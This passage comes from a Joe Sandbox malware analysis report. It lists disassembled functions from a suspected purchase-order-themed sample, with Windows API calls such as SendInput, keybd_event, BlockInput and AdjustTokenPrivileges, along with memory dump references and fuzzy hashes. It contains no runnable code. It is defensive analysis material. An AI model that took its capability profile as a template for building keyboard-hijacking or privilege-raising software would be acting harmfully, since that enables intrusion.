                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F84891,?,?,00000035,?), ref: 00F737F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 6f5bef959cf9be23c7a66e649a924171ef2d17ee4e3a50cd39e8931acfd6ac85
                          • Instruction ID: 91ae3c0b32affaca0f4d9c4d08228837a9aac9666df54149be6295419502752a
                          • Opcode Fuzzy Hash: 6f5bef959cf9be23c7a66e649a924171ef2d17ee4e3a50cd39e8931acfd6ac85
                          • Instruction Fuzzy Hash: 24F0E5B1A082297AEB2017668C4DFEB3BAEEFC4771F004166F509D2281D9609945E6F1
                          Function 00F6B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F6B25D
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F6B270
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: df60fb091217ee8a8906b2c8700a43d228b2b32fcfa1d968ca2f144d86a848c6
                          • Instruction ID: bf6a601f80e5c298e94616d09ea511628320222be26baa7a7cc9d843aaf933b0
                          • Opcode Fuzzy Hash: df60fb091217ee8a8906b2c8700a43d228b2b32fcfa1d968ca2f144d86a848c6
                          • Instruction Fuzzy Hash: 80F06D7180428DABDB058FA0C805BAE7BB0FF04305F00800AF951A5192C3798201AF94
                          Function 00F610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F611FC), ref: 00F610D4
                          • CloseHandle.KERNEL32(?,?,00F611FC), ref: 00F610E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 3a3dba0c82b8b3a636ad6aeac82430ce5ff4b002fefce5e69869c9ce12aca078
                          • Instruction ID: 6655a328e6201d3dd54d88481e47540cc27d493c89c35cec7c09fcb49b91ecb4
                          • Opcode Fuzzy Hash: 3a3dba0c82b8b3a636ad6aeac82430ce5ff4b002fefce5e69869c9ce12aca078
                          • Instruction Fuzzy Hash: ABE0BF72418610AEF7252B51FC05EB777A9EB04320F14882EF5A5804B1DB626CE0EB50
                          Function 00F0CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                          Download Yara Rule
                          Strings
                          • Variable is not of type 'Object'., xrefs: 00F50C40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: Variable is not of type 'Object'.
                          • API String ID: 0-1840281001
                          • Opcode ID: 7e9f9c8a2729e6078cc24b57435285c48bf0c130abed3c0c460c64213e9bc4c5
                          • Instruction ID: 56b708def2fb88526ca5a4711fd20bba57c5d72297c41960d5eba8f946c178c3
                          • Opcode Fuzzy Hash: 7e9f9c8a2729e6078cc24b57435285c48bf0c130abed3c0c460c64213e9bc4c5
                          • Instruction Fuzzy Hash: 06329B71900209DBDF14DF90C881BEDB7B5BF05314F248159E906AB2C2DB79AE49FBA1
                          Function 00F3676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F36766,?,?,00000008,?,?,00F3FEFE,00000000), ref: 00F36998
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 8de7e577ae53b68e200c4e6dc9bff201687e08c407de3a634d6b4f43bb9dcf84
                          • Instruction ID: 65bd1d9f41741756fe622a43343c5dcdfaebef9288a015ab23a509406f049dcc
                          • Opcode Fuzzy Hash: 8de7e577ae53b68e200c4e6dc9bff201687e08c407de3a634d6b4f43bb9dcf84
                          • Instruction Fuzzy Hash: 6CB13C32910609AFDB15CF28C48AB657BE0FF49374F25C658E899CF2A2C735D991DB40
                          Function 00F1B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 740492cead35bb2f0fa2d525cf8ac45ca0eaaeed53563e996b8156aa31106b64
                          • Instruction ID: c3979bfbd40a92e8698ac4ea0055ab3d6529fb980410061bcd7e30db7c894976
                          • Opcode Fuzzy Hash: 740492cead35bb2f0fa2d525cf8ac45ca0eaaeed53563e996b8156aa31106b64
                          • Instruction Fuzzy Hash: 57125E71E00229DBDB14CF58C8807EEB7B5FF48710F14819AE949EB251EB349A85EF90
                          Function 00F7EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 00F7EABD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 7b9a2a649d448c6925a464f967cabf0e02aac6a340decd2a48e9279f415f40c5
                          • Instruction ID: 0b687cc29293766e1248fadbe413a7a5ffd25a97909676f318317d6051d09d66
                          • Opcode Fuzzy Hash: 7b9a2a649d448c6925a464f967cabf0e02aac6a340decd2a48e9279f415f40c5
                          • Instruction Fuzzy Hash: D3E01A322002049FD710EF59D804E9AF7E9AF98760F008457FC49C7291DA74A840ABA1
                          Function 00F209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F203EE), ref: 00F209DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: dcba9e74de51980c6c0de5e23ecdb099591ad69ae2d6ff9aeb9ce32e98f5d668
                          • Instruction ID: c74eb6b062c65a0a18d9fd82bd9046723dc44095ac4b03a55286367aeaaa2a9b
                          • Opcode Fuzzy Hash: dcba9e74de51980c6c0de5e23ecdb099591ad69ae2d6ff9aeb9ce32e98f5d668
                          • Instruction Fuzzy Hash:
                          Function 00F2781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                          • Instruction ID: ad3b28d96e6a9b72eeeb13a3414dbe03cb10498ee9150cacd57906b63d120c24
                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                          • Instruction Fuzzy Hash: 0C519A72E0C7355BDB38B578B85A7FF73859B02360F280509E882C7282C619DE86F752
                          Function 00F36DD9 Relevance: .6, Instructions: 637COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d74cd3f4130c008c46bdb8e5f09f51f7eeca482f91f8b9e6facb81b12e4ef8d
                          • Instruction ID: ef9e12e21b64a1934df65de1b013bfd9223e9367b6e77ce9f6e932c07271ea7c
                          • Opcode Fuzzy Hash: 6d74cd3f4130c008c46bdb8e5f09f51f7eeca482f91f8b9e6facb81b12e4ef8d
                          • Instruction Fuzzy Hash: AA3248A2E29F014DD763A638CC623356249AFB73E5F14C337E816B5DA5EB28C4C36100
                          Function 00F1CC39 Relevance: .6, Instructions: 635COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 990eb94ffda93cb83a236dd7b2a56f0031ca25f27cd34e108c98ff3e800b4eb6
                          • Instruction ID: f2a3edce38b33d5f67673e674b2498c5783969ca5d7ff2e894d8277e5e42e2d0
                          • Opcode Fuzzy Hash: 990eb94ffda93cb83a236dd7b2a56f0031ca25f27cd34e108c98ff3e800b4eb6
                          • Instruction Fuzzy Hash: 24321932E003458FCF24CA69C4946BD7BA1EB85322F298166DE5BD7291D234DD89FBC0
                          Function 00F07920 Relevance: .6, Instructions: 563COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a90def6d0755f6b3ad7e95fd94b757dea8390ef7e862fd3bfe7cbab21d69b547
                          • Instruction ID: d61fe9ba72733b61ff7a3315d6f3e38c91cb136dd34246fc1eb3350175cc4688
                          • Opcode Fuzzy Hash: a90def6d0755f6b3ad7e95fd94b757dea8390ef7e862fd3bfe7cbab21d69b547
                          • Instruction Fuzzy Hash: E122D1B1E04609DFDF14EF64C841AAEB7F2FF44710F144169E812AB292EB39AD54EB50
                          Function 00F091C0 Relevance: .5, Instructions: 475COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa1e3435acc0a5aef9462f864436bc6dc7a13e920c6156ec30441770508142f2
                          • Instruction ID: d0671c6c1f1c3da0e61b311efc3af9114d67a00db7f7546f49d7d9451107e16b
                          • Opcode Fuzzy Hash: aa1e3435acc0a5aef9462f864436bc6dc7a13e920c6156ec30441770508142f2
                          • Instruction Fuzzy Hash: FE02C6B1E00209EFDF04DF54D981AAEBBB5FF44300F108169E8169B291EB75AA54EB91
                          Function 00F39EEE Relevance: .3, Instructions: 294COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6735d21f8452874631131368d163f5d32be37953939b7df95e02e6c7d273c823
                          • Instruction ID: 62b4f4187aac099574c1bd743a780ea7de2460a1fb3eaa351d1be51bbc495363
                          • Opcode Fuzzy Hash: 6735d21f8452874631131368d163f5d32be37953939b7df95e02e6c7d273c823
                          • Instruction Fuzzy Hash: C2B11360E2AF444DD72396398831336F65CAFBB6D5F92D31BFC6674D22EB2286835140
                          Function 00F21C77 Relevance: .3, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction ID: f3fdf073d60bb6f78f9f9e2ddd4724e650d8dd954a214173e04fe88d11b4a718
                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction Fuzzy Hash: B1918773A080B34ADB29463AA53417EFFE17A623B131A079DD4F2CA1C5EE149954F624
                          Function 00F219B0 Relevance: .2, Instructions: 240COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                          • Instruction ID: d7788632db54e801227da5395cac11b5cb8f212ebf63d62149fddb3b945b56a3
                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                          • Instruction Fuzzy Hash: EC9153736090F34ADB29467AA57413EFFF16AA23B131A07ADD4F2CA1C1FD148564FA24
                          Function 00F27A4A Relevance: .2, Instructions: 237COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 081457d48ccca727b2e040c1149e3a4393be4293e7cd8f277ded5204a95eba14
                          • Instruction ID: 9c84795488757f7d8812eba3d3f33e0b3c8617a56d92022bbd5ac9727a4b3bbd
                          • Opcode Fuzzy Hash: 081457d48ccca727b2e040c1149e3a4393be4293e7cd8f277ded5204a95eba14
                          • Instruction Fuzzy Hash: B8618A32A0833996DF38B968BCA5BBE3394DF81770F100919E843CF295DA199E42B715
                          Function 00F27CA7 Relevance: .2, Instructions: 237COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 746355aef9fe61721f9376411473227a41f848031a76ec4b7cfa1add3d496bd4
                          • Instruction ID: 83100893cc59ece4c60fc33e404cc50e44e0aa14aa70e0531b5c718042e91935
                          • Opcode Fuzzy Hash: 746355aef9fe61721f9376411473227a41f848031a76ec4b7cfa1add3d496bd4
                          • Instruction Fuzzy Hash: 94618C36E08B3957DE387A287C51BBF3384EF42760F900959E843DB281DA15AD42F366
                          Function 00F21706 Relevance: .2, Instructions: 232COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                          • Instruction ID: c42296f9dc1a3f392235921d6b25fc2679bd6da4d3691d5777d790609a985b7d
                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                          • Instruction Fuzzy Hash: C7816473A090B34ADB6D423A957447EFFE17AA23B131A079DD4F2CA1C1EE248554F624
                          Function 00F72046 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a57f2fb94c6f993769a393f6cee635d3c4d21841ed53f7dccafaf6acf9fc3c33
                          • Instruction ID: be162989f3ac2de018ac2f79a322fc3b3b95166e5da724e425a7e514fee11750
                          • Opcode Fuzzy Hash: a57f2fb94c6f993769a393f6cee635d3c4d21841ed53f7dccafaf6acf9fc3c33
                          • Instruction Fuzzy Hash: 7D21D8327216158BD728CF79C81267E73E5A764320F188A2FE4A7C33D0DE39A904D790
                          Function 00F82ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00F82B30
